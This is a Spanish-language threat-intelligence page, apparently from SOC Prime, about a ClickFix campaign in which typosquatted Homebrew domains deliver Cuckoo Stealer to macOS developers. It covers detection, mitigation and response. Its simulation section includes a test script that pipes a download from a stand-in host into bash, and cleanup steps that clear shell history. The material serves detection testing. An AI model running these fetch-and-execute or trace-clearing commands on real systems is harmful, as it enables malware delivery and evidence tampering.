SOC Prime Bias: Medio

18 Feb 2026 14:39 UTC

Falsos Homebrew Typosquats utilizados para entregar Cuckoo Stealer a través de ClickFix

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Falsos Homebrew Typosquats utilizados para entregar Cuckoo Stealer a través de ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El informe describe una campaña que abusa de dominios typosquatted de Homebrew para atraer a los desarrolladores de macOS a ejecutar comandos maliciosos de “instalación” a través de la técnica ClickFix. Un one-liner de curl diseñado envía a las víctimas a una infraestructura controlada por el atacante, entregando un cargador de recolección de credenciales seguido del infostealer Cuckoo Stealer. El malware persiste a través de un LaunchAgent, elimina los atributos de cuarentena y exfiltra credenciales y datos de monederos a través de HTTPS. La detección debe centrarse en los patrones del comando curl y la infraestructura asociada.

Investigación

Los investigadores rastrearon el señuelo inicial a homabrews.org, resolviendo en 5.255.123.244 en los Países Bajos y hospedando múltiples dominios similares (incluyendo raw.homabrews.org usado para entrega). El script descargado ejecuta un bucle de dscl authonly para validar las credenciales de macOS, luego recupera un binario llamado brew_agent. En la segunda etapa, Cuckoo Stealer crea un plist de LaunchAgent, elimina las banderas de cuarentena y se comunica con C2 usando intercambio de claves X25519 con cargas cifradas por XOR. La búsqueda de infraestructura descubrió una red de al menos seis dominios compartiendo la misma IP de hospedaje.

Mitigación

Educar a los desarrolladores para verificar las URLs de instalación de Homebrew y evitar copiar y pegar comandos no confiables en Terminal. Habilitar el registro de línea de comando y restringir los patrones donde curl descarga scripts remotos para su ejecución inmediata, especialmente los one-liners estilo “curl | sh”. La protección de endpoints debe alertar sobre la creación sospechosa de LaunchAgent y la eliminación de atributos de cuarentena. Las defensas de red deben bloquear los dominios maliciosos conocidos y marcar el tráfico a raw.homabrews.org y hosts relacionados.

Respuesta

Cuando se detecta un comando curl sospechoso, aislar el endpoint, capturar el script y binario brew_agent, y recolectar el plist de LaunchAgent para análisis. Restablecer las credenciales recolectadas y revocar los tokens comprometidos, especialmente para navegadores, Keychain y monederos de criptomonedas. Revisar forensemente el directorio oculto BrewUpdater, cualquier acceso directo creado y eliminar los archivos maliciosos. Actualizar las detecciones con los IOCs extraídos y monitorear la reutilización de la misma infraestructura.

Flujo de Ataque

Ejecución de Simulación

Requisito Previo: El Control de Prevuelo de Telemetría y Base debe haber pasado.

Racional: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para desencadenar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán al mal diagnóstico.

  • Narrativa de Ataque y Comandos:
    Un atacante ha obtenido un script malicioso codificado en PowerShell alojado en un servidor C2. Para evitar escribir archivos en el disco, el atacante transmite el script directamente a un shell Bash usando curl -fsSL y la -c bandera. El comando se ejecuta interactivamente desde una cuenta de usuario comprometida, imitando un instalador legítimo de “click‑fix”. Los pasos son:

    1. Resolver la URL de carga maliciosa (por ejemplo, https://evil.example.com/payload.sh).
    2. Canalizar la descarga a Bash, instruyendo a Bash que ejecute el contenido con -c.
    3. La carga realiza la recolección de credenciales, crea un archivo oculto y luego elimina el script temporal (cubriendo T1070.004).
  • Script de Prueba de Regresión:

    #!/usr/bin/env bash
    # -------------------------------------------------
    # Simular instalador malicioso de macOS (estilo ClickFix)
    # -------------------------------------------------
    set -euo pipefail
    
    MALICIOUS_URL="https://evil.example.com/payload.sh"
    
    # Transmitir la carga directamente a Bash con -c
    curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)"
    
    # Se asume que la carga realiza sus acciones maliciosas.
    # Para fines de la prueba simplemente imprimimos un marcador.
    echo "Carga maliciosa ejecutada"
  • Comandos de Limpieza:

    # Eliminar cualquier archivo que haya podido ser creado por la carga
    rm -f /tmp/payload.sh
    # Opcionalmente, borrar el historial de comandos para reducir huellas forenses
    history -c